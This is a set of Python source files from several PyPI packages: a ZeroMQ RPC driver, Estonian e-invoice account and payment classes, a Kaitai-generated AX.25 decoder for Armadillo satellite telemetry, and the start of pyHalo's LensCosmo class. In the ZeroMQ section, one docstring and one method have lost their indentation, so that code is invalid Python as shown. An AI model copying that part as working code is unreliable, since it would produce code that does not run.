        # in-socket -> out-socket forwarding map (both directions).
        self.mapping = {}
        # in-socket -> proxy object handling its messages.
        self.proxies = {}
        self.threads = []
        self.sockets = []
        self.subscribe = {}

        self.pool = eventlet.greenpool.GreenPool(conf.rpc_thread_pool_size)

    def register(self, proxy, in_addr, zmq_type_in, out_addr=None,
                 zmq_type_out=None, in_bind=True, out_bind=True,
                 subscribe=None):
        """Register an inbound socket (and optional outbound pair)."""
        LOG.info(_("Registering reactor"))

        if zmq_type_in not in (zmq.PULL, zmq.SUB):
            raise RPCException("Bad input socktype")

        # Items push in.
        inq = ZmqSocket(in_addr, zmq_type_in, bind=in_bind,
                        subscribe=subscribe)

        self.proxies[inq] = proxy
        self.sockets.append(inq)

        LOG.info(_("In reactor registered"))

        # Outbound half is optional; without it this reactor only consumes.
        if not out_addr:
            return

        if zmq_type_out not in (zmq.PUSH, zmq.PUB):
            raise RPCException("Bad output socktype")

        # Items push out.
        outq = ZmqSocket(out_addr, zmq_type_out, bind=out_bind)

        self.mapping[inq] = outq
        self.mapping[outq] = inq
        self.sockets.append(outq)

        LOG.info(_("Out reactor registered"))

    def consume_in_thread(self):
        """Spawn one green thread per registered inbound socket."""
        def _consume(sock):
            LOG.info(_("Consuming socket"))
            while True:
                self.consume(sock)

        for k in self.proxies.keys():
            self.threads.append(
                self.pool.spawn(_consume, k)
            )

    def wait(self):
        for t in self.threads:
            t.wait()

    def close(self):
        for s in self.sockets:
            s.close()

        for t in self.threads:
            t.kill()
class ZmqProxy(ZmqBaseReactor):
"""
A consumer class implementing a
topic-based proxy, forwarding to
IPC sockets.
"""
    def __init__(self, conf):
        super(ZmqProxy, self).__init__(conf)

        # Topics are embedded into IPC socket paths, so any path-separator
        # character in a topic name is dangerous; build a regex matching
        # every separator this platform knows about.
        pathsep = set((os.path.sep or '', os.path.altsep or '', '/', '\\'))
        self.badchars = re.compile(r'[%s]' % re.escape(''.join(pathsep)))
        # topic -> queue feeding that topic's IPC publisher green thread.
        self.topic_proxy = {}
    def consume(self, sock):
        """Receive one message and relay it to the per-topic IPC socket."""
        ipc_dir = CONF.rpc_zmq_ipc_dir

        #TODO(ewindisch): use zero-copy (i.e. references, not copying)
        data = sock.recv()
        topic = data[1]

        LOG.debug(_("CONSUMER GOT %s"), ' '.join(map(pformat, data)))

        # Choose the outbound socket type from the topic prefix:
        # fanout and reply topics are published (PUB), everything else
        # is round-robined (PUSH).
        if topic.startswith('fanout~'):
            sock_type = zmq.PUB
            # Drop the instance suffix after the first '.'.
            topic = topic.split('.', 1)[0]
        elif topic.startswith('zmq_replies'):
            sock_type = zmq.PUB
        else:
            sock_type = zmq.PUSH

        if topic not in self.topic_proxy:
            def publisher(waiter):
                LOG.info(_("Creating proxy for topic: %s"), topic)

                try:
                    # The topic is received over the network,
                    # don't trust this input.
                    if self.badchars.search(topic) is not None:
                        emsg = _("Topic contained dangerous characters.")
                        LOG.warn(emsg)
                        raise RPCException(emsg)

                    out_sock = ZmqSocket("ipc://%s/zmq_topic_%s" %
                                         (ipc_dir, topic),
                                         sock_type, bind=True)
                except RPCException:
                    waiter.send_exception(*sys.exc_info())
                    return

                self.topic_proxy[topic] = eventlet.queue.LightQueue(
                    CONF.rpc_zmq_topic_backlog)
                self.sockets.append(out_sock)

                # It takes some time for a pub socket to open,
                # before we can have any faith in doing a send() to it.
                if sock_type == zmq.PUB:
                    eventlet.sleep(.5)

                waiter.send(True)

                # Drain the queue forever, relaying onto the IPC socket.
                while(True):
                    data = self.topic_proxy[topic].get()
                    out_sock.send(data)
                    LOG.debug(_("ROUTER RELAY-OUT SUCCEEDED %(data)s") %
                              {'data': data})

            wait_sock_creation = eventlet.event.Event()
            eventlet.spawn(publisher, wait_sock_creation)

            try:
                wait_sock_creation.wait()
            except RPCException:
                LOG.error(_("Topic socket file creation failed."))
                return

        try:
            # Non-blocking put: a slow topic drops messages rather than
            # stalling the whole proxy.
            self.topic_proxy[topic].put_nowait(data)
            LOG.debug(_("ROUTER RELAY-OUT QUEUED %(data)s") %
                      {'data': data})
        except eventlet.queue.Full:
            LOG.error(_("Local per-topic backlog buffer full for topic "
                        "%(topic)s. Dropping message.") % {'topic': topic})
def consume_in_thread(self):
"""Runs the ZmqProxy service"""
ipc_dir = CONF.rpc_zmq_ipc_dir
consume_in = "tcp://%s:%s" % \
(CONF.rpc_zmq_bind_address,
CONF.rpc_zmq_port)
consumption_proxy = InternalContext(None)
if not os.path.isdir(ipc_dir):
try:
utils.execute('mkdir', '-p', ipc_dir, run_as_root=True)
utils.execute('chown', "%s:%s" % (os.getuid(), os.getgid()),
ipc_dir, run_as_root=True)
utils.execute('chmod', '750', ipc_dir, run_as_root=True)
except utils.ProcessExecutionError:
with excutils.save_and_reraise_exception():
LOG.error(_("Could not create IPC directory %s") %
(ipc_dir, ))
try:
self.register(consumption_proxy,
consume_in,
zmq.PULL,
out_bind=True)
except zmq.ZMQError:
with excutils.save_and_reraise_exception():
LOG.error(_("Could not create ZeroMQ receiver daemon. "
"Socket may already be in use."))
super(ZmqProxy, self).consume_in_thread()
def unflatten_envelope(packenv):
    """Unflattens the RPC envelope.

    Takes a flat sequence of alternating keys and values and returns a
    dictionary, i.e. [1, 2, 3, 4] => {1: 2, 3: 4}.  A trailing key with
    no value is ignored.

    :param packenv: iterable holding alternating keys and values
    :return: dict mapping each key to the item that follows it
    """
    # next(i) instead of the Python 2-only i.next(): works on both
    # Python 2.6+ and Python 3.
    i = iter(packenv)
    h = {}
    try:
        while True:
            k = next(i)
            h[k] = next(i)
    except StopIteration:
        return h
class ZmqReactor(ZmqBaseReactor):
    """
    A consumer class implementing a
    consumer for messages. Can also be
    used as a 1:1 proxy
    """

    def __init__(self, conf):
        super(ZmqReactor, self).__init__(conf)

    def consume(self, sock):
        #TODO(ewindisch): use zero-copy (i.e. references, not copying)
        data = sock.recv()
        LOG.debug(_("CONSUMER RECEIVED DATA: %s"), data)
        # Proxy mode: if this socket was registered with an output
        # partner, relay the raw message unchanged.
        if sock in self.mapping:
            LOG.debug(_("ROUTER RELAY-OUT %(data)s") % {
                'data': data})
            self.mapping[sock].send(data)
            return
        proxy = self.proxies[sock]
        # data[2] carries the envelope version of the message on the wire.
        if data[2] == 'cast':  # Legacy protocol
            packenv = data[3]
            ctx, msg = _deserialize(packenv)
            request = rpc_common.deserialize_msg(msg)
            ctx = RpcContext.unmarshal(ctx)
        elif data[2] == 'impl_zmq_v2':
            # v2 envelope: flattened key/value pairs start at data[4].
            packenv = data[4:]
            msg = unflatten_envelope(packenv)
            request = rpc_common.deserialize_msg(msg)
            # Unmarshal only after verifying the message.
            ctx = RpcContext.unmarshal(data[3])
        else:
            LOG.error(_("ZMQ Envelope version unsupported or unknown."))
            return
        # Dispatch to the proxy on the reactor's green thread pool.
        self.pool.spawn_n(self.process, proxy, ctx, request)
class Connection(rpc_common.Connection):
    """Manages connections and threads."""

    def __init__(self, conf):
        # Topics this connection has consumers registered for.
        self.topics = []
        self.reactor = ZmqReactor(conf)

    def create_consumer(self, topic, proxy, fanout=False):
        # Register with matchmaker.
        _get_matchmaker().register(topic, CONF.rpc_zmq_host)
        # Subscription scenarios
        if fanout:
            sock_type = zmq.SUB
            # If fanout is a string it is used verbatim as the SUB
            # subscription filter; otherwise subscribe to everything.
            subscribe = ('', fanout)[type(fanout) == str]
            topic = 'fanout~' + topic.split('.', 1)[0]
        else:
            sock_type = zmq.PULL
            subscribe = None
            # Point-to-point topics are host-qualified.
            topic = '.'.join((topic.split('.', 1)[0], CONF.rpc_zmq_host))
        if topic in self.topics:
            LOG.info(_("Skipping topic registration. Already registered."))
            return
        # Receive messages from (local) proxy
        inaddr = "ipc://%s/zmq_topic_%s" % \
            (CONF.rpc_zmq_ipc_dir, topic)
        LOG.debug(_("Consumer is a zmq.%s"),
                  ['PULL', 'SUB'][sock_type == zmq.SUB])
        # The local ZmqProxy owns (binds) the IPC socket; we connect.
        self.reactor.register(proxy, inaddr, sock_type,
                              subscribe=subscribe, in_bind=False)
        self.topics.append(topic)

    def close(self):
        # Unregister all topics from the matchmaker before closing the
        # reactor's sockets and threads.
        _get_matchmaker().stop_heartbeat()
        for topic in self.topics:
            _get_matchmaker().unregister(topic, CONF.rpc_zmq_host)
        self.reactor.close()
        self.topics = []

    def wait(self):
        self.reactor.wait()

    def consume_in_thread(self):
        _get_matchmaker().start_heartbeat()
        self.reactor.consume_in_thread()
def _cast(addr, context, topic, msg, timeout=None, envelope=False,
          _msg_id=None):
    """Fire-and-forget a message to a single host.

    :param addr: zmq address string of the receiving host
    :param context: request context, marshalled alongside the message
    :param topic: topic to send on
    :param msg: message payload
    :param timeout: seconds before giving up (defaults to
        CONF.rpc_cast_timeout)
    :param envelope: whether to use the versioned message envelope
    :param _msg_id: message id used by _call() to route the reply
    :raises RPCException: on ZMQ socket errors
    :raises rpc_common.Timeout: when the send does not finish in time
    """
    timeout_cast = timeout or CONF.rpc_cast_timeout
    payload = [RpcContext.marshal(context), msg]
    # Pre-initialize so the finally clause is safe even if ZmqClient()
    # itself raises (the original's "'conn' in vars()" introspection was
    # fragile under refactoring).
    conn = None
    with Timeout(timeout_cast, exception=rpc_common.Timeout):
        try:
            conn = ZmqClient(addr)
            # assumes cast can't return an exception
            conn.cast(_msg_id, topic, payload, envelope)
        except zmq.ZMQError:
            raise RPCException("Cast failed. ZMQ Socket Exception")
        finally:
            if conn is not None:
                conn.close()
def _call(addr, context, topic, msg, timeout=None,
          envelope=False):
    """Send a message to a single host and wait for its reply.

    :param addr: zmq address string of the receiving host
    :param context: request context
    :param topic: topic to send on
    :param msg: message payload
    :param timeout: seconds to wait for the response (defaults to
        CONF.rpc_response_timeout)
    :param envelope: whether to use the versioned message envelope
    :return: the last response received
    :raises RPCException: on socket errors or malformed replies
    :raises rpc_common.Timeout: when no reply arrives in time
    """
    # timeout_response is how long we wait for a response
    timeout = timeout or CONF.rpc_response_timeout
    # The msg_id is used to track replies.
    msg_id = uuid.uuid4().hex
    # Replies always come into the reply service.
    reply_topic = "zmq_replies.%s" % CONF.rpc_zmq_host
    LOG.debug(_("Creating payload"))
    # Curry the original request into a reply method.
    mcontext = RpcContext.marshal(context)
    payload = {
        'method': '-reply',
        'args': {
            'msg_id': msg_id,
            'context': mcontext,
            'topic': reply_topic,
            'msg': [mcontext, msg]
        }
    }
    LOG.debug(_("Creating queue socket for reply waiter"))
    # Messages arriving async.
    # TODO(ewindisch): have reply consumer with dynamic subscription mgmt
    # Pre-initialize so the finally clause is safe even if ZmqSocket()
    # raises (replaces the fragile "'msg_waiter' in vars()" check).
    msg_waiter = None
    with Timeout(timeout, exception=rpc_common.Timeout):
        try:
            # Subscribe to our unique msg_id on the local reply socket
            # before casting, so the reply cannot race past us.
            msg_waiter = ZmqSocket(
                "ipc://%s/zmq_topic_zmq_replies.%s" %
                (CONF.rpc_zmq_ipc_dir,
                 CONF.rpc_zmq_host),
                zmq.SUB, subscribe=msg_id, bind=False
            )
            LOG.debug(_("Sending cast"))
            _cast(addr, context, topic, payload, envelope)
            LOG.debug(_("Cast sent; Waiting reply"))
            # Blocks until receives reply
            msg = msg_waiter.recv()
            LOG.debug(_("Received message: %s"), msg)
            LOG.debug(_("Unpacking response"))
            # msg[2] carries the envelope version (see ZmqReactor.consume).
            if msg[2] == 'cast':  # Legacy version
                raw_msg = _deserialize(msg[-1])[-1]
            elif msg[2] == 'impl_zmq_v2':
                rpc_envelope = unflatten_envelope(msg[4:])
                raw_msg = rpc_common.deserialize_msg(rpc_envelope)
            else:
                raise rpc_common.UnsupportedRpcEnvelopeVersion(
                    _("Unsupported or unknown ZMQ envelope returned."))
            responses = raw_msg['args']['response']
        # ZMQError trumps the Timeout error.
        except zmq.ZMQError:
            raise RPCException("ZMQ Socket Error")
        except (IndexError, KeyError):
            raise RPCException(_("RPC Message Invalid."))
        finally:
            if msg_waiter is not None:
                msg_waiter.close()
    # It seems we don't need to do all of the following,
    # but perhaps it would be useful for multicall?
    # One effect of this is that we're checking all
    # responses for Exceptions.
    for resp in responses:
        # isinstance(resp, dict) replaces the Python 2-only
        # types.DictType alias (identical on Py2, works on Py3).
        if isinstance(resp, dict) and 'exc' in resp:
            raise rpc_common.deserialize_remote_exception(CONF, resp['exc'])
    return responses[-1]
def _multi_send(method, context, topic, msg, timeout=None,
                envelope=False, _msg_id=None):
    """
    Wraps the sending of messages,
    dispatches to the matchmaker and sends
    message to all relevant hosts.

    :param method: either _cast or _call; selected by __name__ below
    :raises rpc_common.Timeout: when the matchmaker returns no hosts
    """
    conf = CONF
    LOG.debug(_("%(msg)s") % {'msg': ' '.join(map(pformat, (topic, msg)))})
    queues = _get_matchmaker().queues(topic)
    LOG.debug(_("Sending message(s) to: %s"), queues)
    # Don't stack if we have no matchmaker results
    if len(queues) == 0:
        LOG.warn(_("No matchmaker results. Not casting."))
        # While not strictly a timeout, callers know how to handle
        # this exception and a timeout isn't too big a lie.
        raise rpc_common.Timeout(_("No match from matchmaker."))
    # This supports brokerless fanout (addresses > 1)
    # NOTE: both branches return inside the loop, so only the FIRST
    # matched queue is ever used for either cast or call.
    for queue in queues:
        (_topic, ip_addr) = queue
        _addr = "tcp://%s:%s" % (ip_addr, conf.rpc_zmq_port)
        if method.__name__ == '_cast':
            # Casts are fired asynchronously on a green thread.
            eventlet.spawn_n(method, _addr, context,
                             _topic, msg, timeout, envelope,
                             _msg_id)
            return
        # Calls run synchronously and return the response.
        return method(_addr, context, _topic, msg, timeout,
                      envelope)
def create_connection(conf, new=True):
    """Create a Connection object (the `new` flag is accepted for API
    compatibility and ignored here)."""
    connection = Connection(conf)
    return connection
def multicall(conf, *args, **kwargs):
    """Multiple calls: send a call and return what _multi_send collects."""
    result = _multi_send(_call, *args, **kwargs)
    return result
def call(conf, *args, **kwargs):
    """Send a message, expect a response; return the last response."""
    responses = _multi_send(_call, *args, **kwargs)
    return responses[-1]
def cast(conf, *args, **kwargs):
    """Send a message and do not wait for any reply."""
    _multi_send(_cast, *args, **kwargs)
def fanout_cast(conf, context, topic, msg, **kwargs):
    """Send a message to all listening and expect no reply."""
    # NOTE(ewindisch): fanout~ is used because it avoid splitting on .
    # and acts as a non-subtle hint to the matchmaker and ZmqProxy.
    fanout_topic = 'fanout~' + str(topic)
    _multi_send(_cast, context, fanout_topic, msg, **kwargs)
def notify(conf, context, topic, msg, envelope):
    """
    Send notification event.
    Notifications are sent to topic-priority.
    This differs from the AMQP drivers which send to topic.priority.
    """
    # NOTE(ewindisch): dot-priority in rpc notifier does not
    # work with our assumptions.
    dash_topic = topic.replace('.', '-')
    cast(conf, context, dash_topic, msg, envelope=envelope)
def cleanup():
    """Clean up resources in use by implementation."""
    global ZMQ_CTX
    global matchmaker
    if ZMQ_CTX:
        ZMQ_CTX.term()
        ZMQ_CTX = None
    matchmaker = None
def _get_ctxt():
    """Return the process-wide ZeroMQ context, creating it lazily."""
    if not zmq:
        raise ImportError("Failed to import eventlet.green.zmq")
    global ZMQ_CTX
    if not ZMQ_CTX:
        # One shared context, sized by configuration.
        ZMQ_CTX = zmq.Context(CONF.rpc_zmq_contexts)
    return ZMQ_CTX
def _get_matchmaker(*args, **kwargs):
    """Return the global matchmaker, importing it on first use."""
    global matchmaker
    if not matchmaker:
        mm_path = CONF.rpc_zmq_matchmaker
        matchmaker = importutils.import_object(mm_path, *args, **kwargs)
    return matchmaker
|
PypiClean
|
/estonian_e_invoice-1.0.1.tar.gz/estonian_e_invoice-1.0.1/estonian_e_invoice/entities/account.py
|
from decimal import Decimal
from typing import Optional
from estonian_e_invoice.entities.common import Node
from estonian_e_invoice.validation.validation_schemas import (
ACCOUNT_INFO_SCHEMA,
PAYMENT_INFO_SCHEMA,
)
class AccountInfo(Node):
    """
    Describes the accounts of a party.

        account_number: Account number in local banking system.
        iban: International Banking Account Number.
        bic: Bank identification code (SWIFT code).
        bank_name: The name of the bank.
    """

    tag = "AccountInfo"
    validation_schema = ACCOUNT_INFO_SCHEMA

    def __init__(
        self,
        account_number: str,
        iban: Optional[str] = None,
        bic: Optional[str] = None,
        bank_name: Optional[str] = None,
    ) -> None:
        # Collect the raw values first, then run them through the
        # schema-based validator inherited from Node.
        element_values = {
            "AccountNumber": account_number,
            "IBAN": iban,
            "BIC": bic,
            "BankName": bank_name,
        }
        self.elements = self.validate(element_values)
class PaymentInfo(Node):
    """
    Describes the information used for generating payment order form from the invoice.

        currency: Three-character currency code as specified in ISO 4217.
        payment_description: Description of the payment.
        payable: Whether this bill needs to be paid or not. Payment due date is mandatory if payable.
        payment_total_sum: Total amount of the payment.
        payer_name: Name of the payer.
        payment_id: Invoice number.
        pay_to_account: The beneficiary’s account number.
        pay_to_name: The beneficiary’s name.
        pay_due_date: Payment due date.
    """

    tag = "PaymentInfo"
    validation_schema = PAYMENT_INFO_SCHEMA

    def __init__(
        self,
        currency: str,
        payment_description: str,
        payable: bool,
        payment_total_sum: Decimal,
        payer_name: str,
        payment_id: str,
        pay_to_account: str,
        pay_to_name: str,
        pay_due_date: Optional[str] = None,
    ) -> None:
        # Collect the raw values first, then run them through the
        # schema-based validator inherited from Node.
        element_values = {
            "Currency": currency,
            "PaymentDescription": payment_description,
            "Payable": payable,
            "PaymentTotalSum": payment_total_sum,
            "PayerName": payer_name,
            "PaymentId": payment_id,
            "PayToAccount": pay_to_account,
            "PayToName": pay_to_name,
            "PayDueDate": pay_due_date,
        }
        self.elements = self.validate(element_values)
|
PypiClean
|
/satnogs_decoders-1.60.0-py3-none-any.whl/satnogsdecoders/decoder/armadillo.py
|
from pkg_resources import parse_version
import kaitaistruct
from kaitaistruct import KaitaiStruct, KaitaiStream, BytesIO
from enum import Enum
# Generated parsers below rely on Kaitai Struct runtime API >= 0.9;
# fail fast with a clear message if an older runtime is installed.
if parse_version(kaitaistruct.__version__) < parse_version('0.9'):
    raise Exception("Incompatible Kaitai Struct Python API: 0.9 or later is required, but you have %s" % (kaitaistruct.__version__))
class Armadillo(KaitaiStruct):
    """:field dest_callsign: ax25_frame.ax25_header.dest_callsign_raw.callsign_ror.callsign
    :field src_callsign: ax25_frame.ax25_header.src_callsign_raw.callsign_ror.callsign
    :field src_ssid: ax25_frame.ax25_header.src_ssid_raw.ssid
    :field dest_ssid: ax25_frame.ax25_header.dest_ssid_raw.ssid
    :field ctl: ax25_frame.ax25_header.ctl
    :field pid: ax25_frame.payload.pid
    :field time_since_epoch: ax25_frame.payload.data_payload.time_since_epoch
    :field uptime: ax25_frame.payload.data_payload.uptime
    :field avail_nvmem: ax25_frame.payload.data_payload.avail_nvmem
    :field pos_x: ax25_frame.payload.data_payload.pos_x
    :field pos_y: ax25_frame.payload.data_payload.pos_y
    :field pos_z: ax25_frame.payload.data_payload.pos_z
    :field vel_x: ax25_frame.payload.data_payload.vel_x
    :field vel_y: ax25_frame.payload.data_payload.vel_y
    :field vel_z: ax25_frame.payload.data_payload.vel_z
    :field pwr_states_reserved: ax25_frame.payload.data_payload.pwr_states_reserved
    :field gps_power: ax25_frame.payload.data_payload.gps_power
    :field adc_power: ax25_frame.payload.data_payload.adc_power
    :field antenna_power: ax25_frame.payload.data_payload.antenna_power
    :field pdd_power: ax25_frame.payload.data_payload.pdd_power
    :field spacecraft_mode: ax25_frame.payload.data_payload.spacecraft_mode
    :field vbatt: ax25_frame.payload.data_payload.vbatt
    :field input_current: ax25_frame.payload.data_payload.input_current
    :field output_current: ax25_frame.payload.data_payload.output_current
    :field boot_count: ax25_frame.payload.data_payload.boot_count
    :field boot_cause: ax25_frame.payload.data_payload.boot_cause
    :field eps_temp_1: ax25_frame.payload.data_payload.eps_temp_1
    :field eps_temp_2: ax25_frame.payload.data_payload.eps_temp_2
    :field eps_temp_3: ax25_frame.payload.data_payload.eps_temp_3
    :field eps_temp_4: ax25_frame.payload.data_payload.eps_temp_4
    :field eps_bp4a: ax25_frame.payload.data_payload.eps_bp4a
    :field eps_bp4b: ax25_frame.payload.data_payload.eps_bp4b
    :field eps_output_1_current: ax25_frame.payload.data_payload.eps_output_1_current
    :field eps_output_2_current: ax25_frame.payload.data_payload.eps_output_2_current
    :field eps_output_3_current: ax25_frame.payload.data_payload.eps_output_3_current
    :field eps_output_4_current: ax25_frame.payload.data_payload.eps_output_4_current
    :field eps_output_5_current: ax25_frame.payload.data_payload.eps_output_5_current
    :field eps_output_6_current: ax25_frame.payload.data_payload.eps_output_6_current
    :field rxwl_temp_x: ax25_frame.payload.data_payload.rxwl_temp_x
    :field rxwl_temp_y: ax25_frame.payload.data_payload.rxwl_temp_y
    :field rxwl_temp_z: ax25_frame.payload.data_payload.rxwl_temp_z
    :field gyro_temp_x: ax25_frame.payload.data_payload.gyro_temp_x
    :field gyro_temp_y: ax25_frame.payload.data_payload.gyro_temp_y
    :field gyro_temp_z: ax25_frame.payload.data_payload.gyro_temp_z
    :field desired_quaternion_a: ax25_frame.payload.data_payload.desired_quaternion_a
    :field desired_quaternion_b: ax25_frame.payload.data_payload.desired_quaternion_b
    :field desired_quaternion_c: ax25_frame.payload.data_payload.desired_quaternion_c
    :field desired_quaternion_d: ax25_frame.payload.data_payload.desired_quaternion_d
    :field estimated_quaternion_a: ax25_frame.payload.data_payload.estimated_quaternion_a
    :field estimated_quaternion_b: ax25_frame.payload.data_payload.estimated_quaternion_b
    :field estimated_quaternion_c: ax25_frame.payload.data_payload.estimated_quaternion_c
    :field estimated_quaternion_d: ax25_frame.payload.data_payload.estimated_quaternion_d
    :field rotation_rate_x: ax25_frame.payload.data_payload.rotation_rate_x
    :field rotation_rate_y: ax25_frame.payload.data_payload.rotation_rate_y
    :field rotation_rate_z: ax25_frame.payload.data_payload.rotation_rate_z
    :field sun_sensor_address: ax25_frame.payload.data_payload.sun_sensor_address
    :field message: ax25_frame.payload.data_payload.message
    """

    # NOTE: this class is machine-generated by the Kaitai Struct compiler
    # from a .ksy spec; prefer editing the spec over editing this code.

    class BootCauses(Enum):
        unknown_reset = 0
        dedicated_wdt_reset = 1
        i2c_wdt_reset = 2
        hard_reset = 3
        soft_reset = 4
        stack_overflow = 5
        timer_overflow = 6
        brownout_or_power_on_reset = 7
        internal_wdt_reset = 8

    def __init__(self, _io, _parent=None, _root=None):
        self._io = _io
        self._parent = _parent
        self._root = _root if _root else self
        self._read()

    def _read(self):
        self.ax25_frame = Armadillo.Ax25Frame(self._io, self, self._root)

    class Ax25Frame(KaitaiStruct):
        # Top-level AX.25 frame: header followed by an I- or UI-frame
        # payload selected on bits of the control byte.
        def __init__(self, _io, _parent=None, _root=None):
            self._io = _io
            self._parent = _parent
            self._root = _root if _root else self
            self._read()

        def _read(self):
            self.ax25_header = Armadillo.Ax25Header(self._io, self, self._root)
            # Mask the control byte to discriminate the frame type.
            _on = (self.ax25_header.ctl & 19)
            if _on == 0:
                self.payload = Armadillo.IFrame(self._io, self, self._root)
            elif _on == 3:
                self.payload = Armadillo.UiFrame(self._io, self, self._root)
            elif _on == 19:
                self.payload = Armadillo.UiFrame(self._io, self, self._root)
            elif _on == 16:
                self.payload = Armadillo.IFrame(self._io, self, self._root)
            elif _on == 18:
                self.payload = Armadillo.IFrame(self._io, self, self._root)
            elif _on == 2:
                self.payload = Armadillo.IFrame(self._io, self, self._root)

    class Ax25Header(KaitaiStruct):
        # Destination/source callsigns with SSIDs, then the control byte.
        def __init__(self, _io, _parent=None, _root=None):
            self._io = _io
            self._parent = _parent
            self._root = _root if _root else self
            self._read()

        def _read(self):
            self.dest_callsign_raw = Armadillo.CallsignRaw(self._io, self, self._root)
            self.dest_ssid_raw = Armadillo.SsidMask(self._io, self, self._root)
            self.src_callsign_raw = Armadillo.CallsignRaw(self._io, self, self._root)
            self.src_ssid_raw = Armadillo.SsidMask(self._io, self, self._root)
            self.ctl = self._io.read_u1()

    class UiFrame(KaitaiStruct):
        def __init__(self, _io, _parent=None, _root=None):
            self._io = _io
            self._parent = _parent
            self._root = _root if _root else self
            self._read()

        def _read(self):
            self.pid = self._io.read_u1()
            # Only frames from the ARMADILLO source callsign carry the
            # telemetry payload this decoder understands.
            _on = self._parent.ax25_header.src_callsign_raw.callsign_ror.callsign
            if _on == u"KE5DTW":
                self.data_payload = Armadillo.ArmadilloPayload(self._io, self, self._root)

    class Callsign(KaitaiStruct):
        def __init__(self, _io, _parent=None, _root=None):
            self._io = _io
            self._parent = _parent
            self._root = _root if _root else self
            self._read()

        def _read(self):
            self.callsign = (self._io.read_bytes(6)).decode(u"ASCII")

    class IFrame(KaitaiStruct):
        def __init__(self, _io, _parent=None, _root=None):
            self._io = _io
            self._parent = _parent
            self._root = _root if _root else self
            self._read()

        def _read(self):
            self.pid = self._io.read_u1()
            self.ax25_info = self._io.read_bytes_full()

    class SsidMask(KaitaiStruct):
        def __init__(self, _io, _parent=None, _root=None):
            self._io = _io
            self._parent = _parent
            self._root = _root if _root else self
            self._read()

        def _read(self):
            self.ssid_mask = self._io.read_u1()

        @property
        def ssid(self):
            # Lazily computed and memoized, as generated by Kaitai.
            if hasattr(self, '_m_ssid'):
                return self._m_ssid if hasattr(self, '_m_ssid') else None
            self._m_ssid = ((self.ssid_mask & 15) >> 1)
            return self._m_ssid if hasattr(self, '_m_ssid') else None

    class ArmadilloPayload(KaitaiStruct):
        # Fixed-layout little-endian telemetry block.
        def __init__(self, _io, _parent=None, _root=None):
            self._io = _io
            self._parent = _parent
            self._root = _root if _root else self
            self._read()

        def _read(self):
            self.pb_magic = self._io.read_bytes(5)
            self.time_since_epoch = self._io.read_u4le()
            self.uptime = self._io.read_u4le()
            self.avail_nvmem = self._io.read_u4le()
            self.pos_x = self._io.read_f4le()
            self.pos_y = self._io.read_f4le()
            self.pos_z = self._io.read_f4le()
            self.vel_x = self._io.read_f4le()
            self.vel_y = self._io.read_f4le()
            self.vel_z = self._io.read_f4le()
            # Power-state flags are packed big-endian into one byte.
            self.pwr_states_reserved = self._io.read_bits_int_be(3)
            self.gps_power = self._io.read_bits_int_be(1) != 0
            self.adc_power = self._io.read_bits_int_be(1) != 0
            self.antenna_power = self._io.read_bits_int_be(1) != 0
            self.pdd_power = self._io.read_bits_int_be(1) != 0
            self.spacecraft_mode = self._io.read_bits_int_be(1) != 0
            self._io.align_to_byte()
            self.vbatt = self._io.read_u2le()
            self.input_current = self._io.read_u2le()
            self.output_current = self._io.read_u2le()
            self.boot_count = self._io.read_u4le()
            self.boot_cause = self._io.read_u1()
            self.eps_temp_1 = self._io.read_s2le()
            self.eps_temp_2 = self._io.read_s2le()
            self.eps_temp_3 = self._io.read_s2le()
            self.eps_temp_4 = self._io.read_s2le()
            self.eps_bp4a = self._io.read_s2le()
            self.eps_bp4b = self._io.read_s2le()
            self.eps_output_1_current = self._io.read_u2le()
            self.eps_output_2_current = self._io.read_u2le()
            self.eps_output_3_current = self._io.read_u2le()
            self.eps_output_4_current = self._io.read_u2le()
            self.eps_output_5_current = self._io.read_u2le()
            self.eps_output_6_current = self._io.read_u2le()
            self.rxwl_temp_x = self._io.read_f4le()
            self.rxwl_temp_y = self._io.read_f4le()
            self.rxwl_temp_z = self._io.read_f4le()
            self.gyro_temp_x = self._io.read_f4le()
            self.gyro_temp_y = self._io.read_f4le()
            self.gyro_temp_z = self._io.read_f4le()
            self.desired_quaternion_a = self._io.read_f4le()
            self.desired_quaternion_b = self._io.read_f4le()
            self.desired_quaternion_c = self._io.read_f4le()
            self.desired_quaternion_d = self._io.read_f4le()
            self.estimated_quaternion_a = self._io.read_f4le()
            self.estimated_quaternion_b = self._io.read_f4le()
            self.estimated_quaternion_c = self._io.read_f4le()
            self.estimated_quaternion_d = self._io.read_f4le()
            self.rotation_rate_x = self._io.read_f4le()
            self.rotation_rate_y = self._io.read_f4le()
            self.rotation_rate_z = self._io.read_f4le()
            self.sun_sensor_address = self._io.read_u1()
            # NUL-terminated ASCII status message in a 110-byte field.
            self.message = (KaitaiStream.bytes_terminate(self._io.read_bytes(110), 0, False)).decode(u"ASCII")

    class CallsignRaw(KaitaiStruct):
        # AX.25 callsigns are stored shifted left one bit; rotate to
        # recover the ASCII text.
        def __init__(self, _io, _parent=None, _root=None):
            self._io = _io
            self._parent = _parent
            self._root = _root if _root else self
            self._read()

        def _read(self):
            self._raw__raw_callsign_ror = self._io.read_bytes(6)
            self._raw_callsign_ror = KaitaiStream.process_rotate_left(self._raw__raw_callsign_ror, 8 - (1), 1)
            _io__raw_callsign_ror = KaitaiStream(BytesIO(self._raw_callsign_ror))
            self.callsign_ror = Armadillo.Callsign(_io__raw_callsign_ror, self, self._root)
|
PypiClean
|
/pyhalo-1.0.0-py3-none-any.whl/pyHalo/Halos/lens_cosmo.py
|
import numpy
from scipy.interpolate import interp1d
from scipy.optimize import minimize
from scipy.special import erfc
from lenstronomy.Cosmo.nfw_param import NFWParam
import astropy.units as un
from colossus.lss.bias import twoHaloTerm
from scipy.integrate import quad
class LensCosmo(object):
def __init__(self, z_lens=None, z_source=None, cosmology=None):
    """
    This class performs calcuations relevant for certain halo mass profiles and lensing-related quantities for a
    given lens/source redshift and cosmology

    :param z_lens: deflector redshift
    :param z_source: source redshift
    :param cosmology: an instance of the Cosmology class (see pyhalo.Cosmology.cosmology.py)
    """
    if cosmology is None:
        from pyHalo.Cosmology.cosmology import Cosmology
        cosmology = Cosmology()
    self.cosmo = cosmology
    # one arcsecond in radians
    self._arcsec = 2 * numpy.pi / 360 / 3600
    self.h = self.cosmo.h
    # critical density of the universe in M_sun h^2 Mpc^-3
    rhoc = un.Quantity(self.cosmo.astropy.critical_density(0), unit=un.Msun / un.Mpc ** 3).value
    self.rhoc = rhoc / self.cosmo.h ** 2
    if z_lens is not None and z_source is not None:
        # critical density for lensing in units M_sun * Mpc ^ -2
        self.sigma_crit_lensing = self.get_sigma_crit_lensing(z_lens, z_source)
